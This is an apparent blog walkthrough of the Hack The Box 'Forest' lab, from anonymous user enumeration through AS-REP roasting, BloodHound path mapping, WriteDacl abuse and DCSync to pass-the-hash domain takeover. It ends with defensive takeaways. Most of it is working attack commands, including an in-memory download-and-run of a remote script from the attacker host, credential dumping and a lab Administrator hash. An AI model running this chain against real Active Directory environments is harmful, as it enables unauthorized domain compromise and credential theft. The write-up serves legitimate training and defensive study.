Forest | Hack The Box Walkthrough | OSCP Style

From an AS-REP Roastable account to Domain Admin via BloodHound, ACL abuse (WriteDacl), and a DCSync attack.

From an AS-REP Roastable account to Domain Admin via BloodHound, ACL abuse (WriteDacl), and a DCSync attack.

Forest is one of the most instructive Active Directory machines on Hack The Box. It chains together a sequence of techniques that map almost one-to-one onto real-world domain compromises: enumerating users anonymously, AS-REP Roasting a service account, mapping attack paths with BloodHound, abusing Active Directory ACLs (WriteDacl) to escalate privileges, and finally performing a DCSync to dump every credential in the domain. Let’s work through it step by step.

Reconnaissance

We start with a full TCP scan that fingerprints services and runs the default NSE scripts:

nmap -p- --open -sS -sV -sC --min-rate 5000 -n 10.10.10.161 -oN result.txt

Figure 1. Full nmap scan revealing a domain controller (Kerberos, LDAP, DNS, SMB) for the htb.local domain.

The service set is a textbook domain controller, and the domain htb.local is exposed throughout. With SMB and LDAP open, our first move is to enumerate domain users without credentials.

Anonymous User Enumeration

Forest allows anonymous (null-session) access, so we can list domain users without any credentials using CrackMapExec:

crackmapexec smb 10.10.10.161 -u '' -p '' --users

Figure 2. Enumerating domain users through an anonymous SMB session with CrackMapExec.

We save the resulting usernames into a users.txt file for the next step.

AS-REP Roasting

With a list of valid users, we test for AS-REP Roasting. This attack targets accounts that have the “Do not require Kerberos pre-authentication” flag set: for those accounts, the KDC will hand out an encrypted AS-REP message to anyone who asks, with no authentication required. That message is encrypted with the account’s password hash, so we can crack it offline. Impacket’s GetNPUsers performs the request:

sudo impacket-GetNPUsers htb.local/ -no-pass -usersfile users.txt

Figure 3. GetNPUsers identifies svc-alfresco as AS-REP Roastable and dumps its hash.

The account svc-alfresco is roastable, and we get its Kerberos AS-REP hash. We crack it with Hashcat using mode 18200 (Kerberos 5 AS-REP, etype 23) against rockyou.txt:

hashcat -a 0 -m 18200 hash.txt /usr/share/wordlists/rockyou.txt --force

Figure 4. Hashcat cracks the AS-REP hash, recovering the cleartext password for svc-alfresco.

Initial Foothold

Before connecting, we confirm the credentials are valid for WinRM with CrackMapExec:

crackmapexec winrm 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'

Figure 5. CrackMapExec confirms svc-alfresco can authenticate over WinRM (Pwn3d!).

Since WinRM is available, we get an interactive PowerShell session with evil-winrm:

evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'

Figure 6. Interactive shell obtained as svc-alfresco via evil-winrm: the user flag is within reach.

Mapping Attack Paths with BloodHound

Having a foothold in an AD environment, the smartest next step is to map relationships and privileges rather than guess. We use BloodHound, fed by the SharpHound collector. The PowerShell collector can be loaded directly into memory from our attacking machine:

IEX(New-Object Net[.]WebClient).downloadString('hxxp://10.10.14.3/SharpHound[.]ps1')
Invoke-BloodHound -CollectionMethod All

Figure 7. Loading the SharpHound collector into memory over HTTP.

Figure 8. SharpHound enumerating the domain.

Figure 9. Running Invoke-BloodHound with the All collection method.

Figure 10. Collection complete; the results are written to a zip archive.

We then download the collected data back to Kali to import it into BloodHound:

download C:\Users\svc-alfresco\Desktop\20240315213625_BloodHound.zip data.zip

Figure 11. Downloading the BloodHound collection archive to the attacking machine.

As an alternative, the compiled SharpHound[.]exe can be uploaded and run on the host directly:

wget hxxp://10.10.14.3/SharpHound[.]exe -O SharpHound[.]exe
.\SharpHound[.]exe -c all

Figure 12. Transferring the compiled SharpHound[.]exe collector to the target.

A practical tip: SharpHound and BloodHound versions must be compatible. In this case I had to use SharpHound v3.4 to match the BloodHound version I was running, a newer collector produced data the GUI refused to import. Always pair the collector to your BloodHound version.

Figure 13. Running the compiled collector (SharpHound v3.4 for compatibility).

Figure 14. Downloading the second collection archive.

Privilege Escalation

Importing the data into BloodHound reveals the path. svc-alfresco is a member of Account Operators (through nested group membership: Service Accounts → Privileged IT Accounts → Account Operators). The Account Operators group can create and manage user accounts and modify non-protected groups.

Figure 15. BloodHound shows svc-alfresco’s nested membership leading to Account Operators, with reachable high-value targets.

The key piece is that the Exchange Windows Permissions group holds WriteDacl rights over the domain object. WriteDacl lets a member rewrite the domain's access control list: including granting itself the replication rights needed for a DCSync attack. So our plan is: create a user, add it to Exchange Windows Permissions, then use that power to grant ourselves DCSync.

First, we use our Account Operators rights to create a new domain user:

net user crypto prueba123 /add /domain

Figure 16. Creating a new domain user with our Account Operators privileges.

Figure 17. Confirming the new account was created in the domain.

Because the path runs through the Exchange Windows Permissions group’s WriteDacl, we add our new user to that group:

Figure 18. BloodHound highlighting the WriteDacl edge from Exchange Windows Permissions to the domain.

Figure 19. Reviewing the abuse path before exploitation.

net group "Exchange Windows Permissions" crypto /add

Figure 20. Adding our user to the Exchange Windows Permissions group.

DCSync Attack

Now that our user inherits WriteDacl over the domain, we use PowerView to grant that user DCSync rights. DCSync abuses the Directory Replication Service: it lets an account request password data from the domain controller as if it were another DC, effectively dumping any credential in the domain, including the Administrator's.

$pass = ConvertTo-SecureString 'abc123!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('htb\crypto', $pass)
Add-ObjectACL -PrincipalIdentity crypto -Credential $cred -Rights DCSync

Figure 21. Granting DCSync replication rights to our controlled user via PowerView’s Add-ObjectACL.

With replication rights in place, we run Impacket’s secretsdump as our user to extract the NTDS secrets, including the Administrator NTLM hash:

impacket-secretsdump htb.local/crypto@10.10.10.161

Figure 22. secretsdump performing a DCSync and dumping the domain’s NTLM hashes.

Domain Compromise

We don’t need to crack the Administrator hash. We authenticate with it directly using Pass-the-Hash via psexec, landing a SYSTEM shell and capturing the root flag:

impacket-psexec administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Figure 23. Pass-the-Hash with psexec yields a SYSTEM shell as Administrator.

Figure 24. The root flag captured: the domain is fully compromised.

Conclusion

Forest is a masterclass in Active Directory attack chaining. None of the individual steps relies on a software exploit. Every move abuses legitimate features and misconfigurations: anonymous enumeration, a service account without Kerberos pre-authentication, excessive group memberships, and a dangerous ACL that let a low-privileged user escalate all the way to a DCSync. BloodHound was the linchpin, turning a tangle of group memberships into a clear, exploitable path.

Key takeaways:

  • Disable anonymous SMB/LDAP enumeration on domain controllers.
  • Never leave “Do not require Kerberos pre-authentication” enabled. It invites AS-REP Roasting.
  • Audit group memberships; nested membership in Account Operators is dangerous.
  • Dangerous ACLs like WriteDacl over the domain object lead straight to DCSync and full compromise.
  • BloodHound is as valuable to defenders as it is to attackers: run it on your own domain.

References

If you’re interested in following my upcoming articles on OT/ICS, certifications, HTB content, and Red Team experiences, I invite you to connect with me on LinkedIn or Instagram.